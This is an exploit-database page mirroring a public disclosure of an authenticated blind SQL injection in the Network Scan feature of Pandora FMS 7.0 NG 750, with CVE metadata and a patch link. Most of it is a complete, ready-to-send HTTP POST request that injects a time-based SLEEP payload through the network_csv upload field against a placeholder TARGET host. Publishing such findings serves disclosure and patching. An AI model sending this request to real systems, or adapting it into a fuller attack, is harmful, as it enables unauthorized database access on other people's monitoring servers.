Advertisement






Pandora FMS 7.0 NG 750 SQL Injection

CVE Category Price Severity
CVE-2020-4100 CWE-89 Not specified High
Author Risk Exploitation Type Date
Pandora FMS team High Remote 2020-12-23
CPE
cpe:cpe:/a:pandora_fms:pandora_fms:7.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.17353 0.86266

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120155

Below is a copy:

Pandora FMS 7.0 NG 750 SQL Injection
# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
# Date: 12-21-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 750
# Tested on: Ubuntu 18.04


# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
# Vulnerable Parameter : network_csv


# POC

POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
Content-Length: 1597
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1

-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_manual_defined"

1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_select"

300
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_text"

0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval"

0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_units"

1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="taskname"

test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="id_recon_server"

3
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv_enabled"

on
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
Content-Type: text/plain

' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a

-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network"


-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="comment"

test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="submit"

Next
-----------------------------308827614039434535382911921119--

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.